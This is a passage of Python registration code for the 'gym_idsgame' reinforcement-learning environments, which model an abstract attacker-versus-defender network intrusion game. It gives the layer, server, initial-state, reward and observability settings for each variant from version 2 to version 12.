# [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 2
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v2',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV2Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 2
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v2',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV2Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 2
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v2',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV2Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 2
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v2',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV2Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 2
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v2',
entry_point='gym_idsgame.envs:IdsGameV2Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 3 ------------
# [AttackerEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 3
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v3',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV3Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 2 layer, 3 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 3
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v3',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV3Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 3
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v3',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV3Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 3
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v3',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV3Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 3
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v3',
entry_point='gym_idsgame.envs:IdsGameV3Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 4 ------------
# [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 4
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v4',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV4Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 4 layer, 5 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 4
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v4',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV4Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 4
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v4',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV4Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 4
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v4',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV4Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 4
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v4',
entry_point='gym_idsgame.envs:IdsGameV4Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 5 ------------
# [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 5
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v5',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV5Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
# defender following the "defend minimal strategy", connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 5
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v5',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV5Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 5
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v5',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV5Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
# attacker following the "attack maximal strategy", connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 5
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v5',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV5Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Sparse
# [Version] 5
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v5',
entry_point='gym_idsgame.envs:IdsGameV5Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 6 ------------
# [AttackerEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random defender, connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 6
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v6',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV6Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 4 layer, 5 servers per layer, 10 attack-defense-values,
# defender following the "defend minimal strategy", connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 6
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v6',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV6Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, random attacker, connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 6
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v6',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV6Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values,
# attacker following the "attack maximal strategy", connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 6
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v6',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV6Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 4 layers, 5 servers per layer, 10 attack-defense-values, connected layers
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 5
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v6',
entry_point='gym_idsgame.envs:IdsGameV6Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 7 ------------
# [AttackerEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 7
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v7',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV7Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 2 layer, 3 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 7
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v7',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV7Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 7
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v7',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV7Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 7
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v7',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV7Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 2 layers, 3 servers per layer, 10 attack-defense-values
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 7
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v7',
entry_point='gym_idsgame.envs:IdsGameV7Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 8 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 8
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v8',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV8Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 8
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v8',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV8Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 8
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v8',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV8Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 8
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v8',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV8Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 8
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v8',
entry_point='gym_idsgame.envs:IdsGameV8Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 9 ------------
# [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 9
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v9',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV9Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 9
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v9',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV9Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 9
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v9',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV9Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 9
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v9',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV9Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 2 servers per layer, 10 attack-defense-values
# [Initial State] Defense: 4, Attack:0, Num vulnerabilities: 4, Det: 3, Vulnerability value: 0
# [Rewards] Dense
# [Version] 9
# [Observations] partially observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v9',
entry_point='gym_idsgame.envs:IdsGameV9Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 10 ------------
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random defender
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 10
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v10',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV10Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 1 layer, 1 server per layer, 10 attack-defense-values, defender following the "defend minimal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 10
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v10',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV10Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, random attacker
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 10
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v10',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV10Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values, attacker following the "attack maximal strategy"
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 10
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v10',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV10Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 1 layer, 1 server per layer, 10 attack-defense-values
# [Initial State] Defense: 2, Attack:0, Num vulnerabilities: 1, Det: 2, Vulnerability value: 0
# [Rewards] Dense
# [Version] 10
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v10',
entry_point='gym_idsgame.envs:IdsGameV10Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 11 ------------
# [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 11
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v11',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV11Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 11
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v11',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV11Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 11
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v11',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV11Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 11
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v11',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV11Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: 0, Attack:0, Num vulnerabilities: 0, Det: 1, Vulnerability value: 0
# [Rewards] Dense
# [Version] 11
# [Observations] fully observed
# [Environment] Deterministic
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-v11',
entry_point='gym_idsgame.envs:IdsGameV11Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# -------- Version 12 ------------
# [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random),
# Vulnerability value: 0
# [Rewards] Dense
# [Version] 12
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_defense-v12',
entry_point='gym_idsgame.envs:IdsGameRandomDefenseV12Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackerEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random),
# Vulnerability value: 0
# [Rewards] Dense
# [Version] 12
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-minimal_defense-v12',
entry_point='gym_idsgame.envs:IdsGameMinimalDefenseV12Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random),
# Vulnerability value: 0
# [Rewards] Dense
# [Version] 12
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-random_attack-v12',
entry_point='gym_idsgame.envs:IdsGameRandomAttackV12Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [DefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
# [Initial State] Defense: (0-1) (random), Attack: (0-1) (random), Num vulnerabilities: 0, Det: (0-1) (random),
# Vulnerability value: 0
# [Rewards] Dense
# [Version] 12
# [Observations] fully observed
# [Environment] Random
# [Attacker Starting Position] Start node
# [Reconnaissance activities] disabled
# [Reconnaissance bool features] No
register(
id='idsgame-maximal_attack-v12',
entry_point='gym_idsgame.envs:IdsGameMaximalAttackV12Env',
kwargs={'idsgame_config': None, 'save_dir': None, 'initial_state_path': None}
)
# [AttackDefenseEnv] 0 layers, 1 server per layer, 2 attack-defense-values
